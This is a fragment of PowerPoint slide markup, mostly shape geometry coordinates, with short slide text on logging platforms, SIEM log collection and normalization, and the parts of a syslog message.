                    <a:pt x="56243" y="1577241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70728" y="1620229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86756" y="1662482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104295" y="1703967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123310" y="1744650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143768" y="1784497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165636" y="1823475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188878" y="1861549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213463" y="1898686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239355" y="1934852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266522" y="1970013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294929" y="2004136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324543" y="2037187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355330" y="2069131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387256" y="2099936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420288" y="2129567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454391" y="2157991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489533" y="2185174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525680" y="2211082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562797" y="2235682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600851" y="2258939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639808" y="2280820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679635" y="2301291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720297" y="2320319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761762" y="2337869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803995" y="2353908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="846963" y="2368402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890631" y="2381317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934967" y="2392620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979936" y="2402276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025505" y="2410253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071640" y="2416516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1118307" y="2421031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165473" y="2423765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1213103" y="2424684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1260734" y="2423765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1307900" y="2421031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1354567" y="2416516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400702" y="2410253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1446271" y="2402276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1491240" y="2392620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535576" y="2381317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579244" y="2368402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622212" y="2353908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664445" y="2337869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705910" y="2320319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1746572" y="2301291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786399" y="2280820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1825356" y="2258939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863410" y="2235682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900527" y="2211082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1936674" y="2185174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1971816" y="2157991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2005919" y="2129567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038951" y="2099936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070877" y="2069131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101664" y="2037187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131278" y="2004136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159685" y="1970013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186852" y="1934852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2212744" y="1898686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2237329" y="1861549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260571" y="1823475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2282439" y="1784497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2302897" y="1744650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2321912" y="1703967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2339451" y="1662482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2355479" y="1620229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369964" y="1577241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382871" y="1533552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2394166" y="1489196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403816" y="1444207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411787" y="1398619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2418045" y="1352464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422557" y="1305778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425289" y="1258593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2426207" y="1210945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425274" y="1162952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2422497" y="1115436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417911" y="1068431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411551" y="1021971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2403451" y="976091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393647" y="930825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2382173" y="886208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2369064" y="842273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2354355" y="799055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338081" y="756588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320275" y="714907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300974" y="674046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2280212" y="634039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258024" y="594921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2234444" y="556725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2209507" y="519487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183248" y="483240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155702" y="448019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126904" y="413858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096888" y="380792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065689" y="348854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033342" y="318080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999882" y="288503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965344" y="260158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929762" y="233079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893170" y="207300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855605" y="182856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1817101" y="159781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777691" y="138109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737412" y="117875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696298" y="99113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654384" y="81857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1611705" y="66141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568294" y="52001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524188" y="39470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1479421" y="28583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1434027" y="19373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388042" y="11875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341500" y="6125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294436" y="2154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246885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13068" y="306451"/>
            <a:ext cx="32289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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Platforms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32347" y="760476"/>
            <a:ext cx="4536948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45563" y="1933193"/>
            <a:ext cx="1155827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Log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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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various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sources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collected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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SIEM.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Various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log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normalization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tools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are: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72589" y="3484626"/>
            <a:ext cx="6162040" cy="2306320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2306320">
                <a:moveTo>
                  <a:pt x="0" y="384301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2994" y="336101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11738" y="289685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25871" y="245415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45032" y="203651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68861" y="164753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96998" y="129082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129082" y="96998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164753" y="68861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203651" y="45032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245415" y="25871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289685" y="11738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336101" y="2994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384302" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777230" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825430" y="2994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871846" y="11738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916116" y="25871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5957880" y="45032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5996778" y="68861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032449" y="96998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064533" y="129082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092670" y="164753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116499" y="203651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6135660" y="245415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149793" y="289685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158537" y="336101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="384301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1921510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158537" y="1969710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149793" y="2016126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6135660" y="2060396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116499" y="2102160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092670" y="2141058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6064533" y="2176729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6032449" y="2208813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5996778" y="2236950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5957880" y="2260779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5916116" y="2279940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871846" y="2294073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825430" y="2302817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777230" y="2305812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="384302" y="2305812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336101" y="2302817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289685" y="2294073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245415" y="2279940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203651" y="2260779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164753" y="2236950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129082" y="2208813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96998" y="2176729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68861" y="2141058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45032" y="2102160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25871" y="2060396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11738" y="2016126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2994" y="1969710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1921510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="384301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913635" y="3894530"/>
            <a:ext cx="5147310" cy="1763395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="54610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430"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Logging</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>format,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>protocol,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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000" spc="-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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="20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  <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(daemon)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>software</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>PR</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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415">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>fa</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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7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dirty="0" sz="2000" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>rity</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>header</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>made</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>up</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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11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0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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>timestamp, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>host,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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0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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>part.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08504" y="2953511"/>
            <a:ext cx="4410710" cy="739140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="739139">
                <a:moveTo>
                  <a:pt x="4287266" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="123189" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75223" y="9675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36068" y="36067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="75223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="123189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="615950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9675" y="663916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36068" y="703072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75223" y="729464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123189" y="739139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287266" y="739139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335232" y="729464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4374387" y="703072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4400780" y="663916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="615950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="123189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4400780" y="75223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4374388" y="36067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335232" y="9675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4287266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292346" y="3130042"/>
            <a:ext cx="84201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5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200" spc="-120">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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200" spc="-1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dirty="0" sz="2200" spc="40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>og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643366" y="6703314"/>
            <a:ext cx="6162040" cy="1468120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="1468120">
                <a:moveTo>
                  <a:pt x="0" y="244602"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4967" y="195295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19216" y="149375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41764" y="107825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71628" y="71628"/>
